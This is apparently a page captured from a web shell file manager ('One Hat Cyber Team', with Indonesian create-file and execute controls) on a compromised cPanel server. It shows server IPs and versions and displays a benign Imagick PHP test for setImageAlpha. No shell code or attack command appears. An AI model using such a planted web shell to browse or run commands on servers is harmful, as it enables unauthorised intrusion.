⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.19
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
local
/
src
/
imagick
/
tests
/
View File Name :
274_imagick_setImageAlpha.phpt
--TEST-- Imagick::setImageAlpha --SKIPIF-- <?php $imageMagickRequiredVersion=0x700; require_once(dirname(__FILE__) . '/skipif.inc'); ?> --FILE-- <?php require_once __DIR__ . "/../util/functions.php"; $imagick = new Imagick(); $imagick->newPseudoImage(256, 256, 'xc:purple'); $imagick->setImageAlpha(0.5); $imagick->setImageFormat('png'); $imagick->writeImage(__DIR__ . "/setAlphaTest.png"); $pixelTypes = array( Imagick::PIXEL_CHAR => array(128, 0, 128, 128), Imagick::PIXEL_FLOAT => array(0.50196081399918, 0, 0.50196081399918, 0.5), Imagick::PIXEL_DOUBLE => array(0.50196078431373, 0, 0.50196078431373, 0.5), Imagick::PIXEL_SHORT => array(32896, 0, 32896, 32768), ); function getColorError($type, $expected, $actual) { if ($type == Imagick::PIXEL_CHAR || $type == Imagick::PIXEL_SHORT) { $string = "Expected: " . $actual . "\n"; $string .= "Actual : " . $actual . "\n"; return $string; } if ($type == Imagick::PIXEL_FLOAT) { return float_compare_32($expected, $actual); } if ($type == Imagick::PIXEL_DOUBLE) { return float_compare($expected, $actual); } echo "Unknown type: $type \n"; exit(-1); } foreach ($pixelTypes as $pixelType => $expectedValues) { $pixels = $imagick->exportImagePixels(0, 0, 1, 1, "RGBA", $pixelType); $channelNames = ['R', 'G', 'B', 'A']; // Loop over the colours for ($channel = 0; $channel < 4; $channel++) { $actual = $pixels[$channel]; $expected = $expectedValues[$channel]; if (abs($actual - $expected) > get_epsilon_for_off_by_half_errors()) { $channelName = $channelNames[$channel]; echo "Pixel values appear incorrect for pixelType $pixelType channel:$channelName\n"; echo getColorError($pixelType, $expected, $actual); break; } } } echo "Ok"; ?> --CLEAN-- <?php $f = __DIR__ . '/setAlphaTest.png'; if (file_exists($f)) { @unlink($f); } ?> --EXPECTF-- Ok